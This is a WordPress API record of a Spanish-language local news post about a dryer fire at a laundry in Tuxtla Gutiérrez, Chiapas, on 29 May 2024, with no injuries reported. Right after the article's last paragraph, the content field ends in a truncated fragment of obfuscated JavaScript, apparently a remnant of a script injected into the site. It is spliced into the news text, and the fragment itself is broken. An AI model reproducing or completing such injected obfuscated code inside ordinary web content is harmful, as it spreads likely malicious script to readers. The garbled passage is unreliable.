{"id":15856,"date":"2024-05-30T00:49:09","date_gmt":"2024-05-30T00:49:09","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15856"},"modified":"2024-05-30T00:49:09","modified_gmt":"2024-05-30T00:49:09","slug":"se-incendia-lavanderia-en-la-en-el-barrio-san-francisco-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15856","title":{"rendered":"Se incendia lavander\u00eda en la en el Barrio San Francisco de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15858\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1717029975987-1024x576.jpg\" alt=\"\" class=\"wp-image-15858\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1717029975987-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1717029975987-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1717029975987-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1717029975987.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15857\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1717029978632-1024x576.jpg\" alt=\"\" class=\"wp-image-15857\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1717029978632-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1717029978632-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1717029978632-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1717029978632.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 29 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la ma\u00f1ana se registr\u00f3 un incendio en una lavander\u00eda localizada en en el Libramiento Sur, entre 1a y 2a Poniente.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando los mismos empleados reportaron a los n\u00fameros de emergencias que sal\u00eda humo de una secadora.<\/p>\n\n\n\n<p>El fuego se extendi\u00f3 a otras \u00e1reas del establecimiento.<\/p>\n\n\n\n<p>Minutos despu\u00e9s arribaron elementos del cuerpo de Bomberos y atacaron las llamas con equipo especializado y en poco tiempo apagaron el siniestro.<\/p>\n\n\n\n<p>El fuego consumi\u00f3 dos secadoras y una lavadora, afortunadamente no hubo personas heridas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 29 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la ma\u00f1ana se registr\u00f3 un incendio en una lavander\u00eda localizada en en el Libramiento Sur, entre 1a y 2a Poniente. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando los mismos empleados reportaron a los n\u00fameros de emergencias que sal\u00eda &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15858,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15856","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15856","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15856"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15856\/revisions"}],"predecessor-version":[{"id":15859,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15856\/revisions\/15859"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15858"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15856"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15856"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15856"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}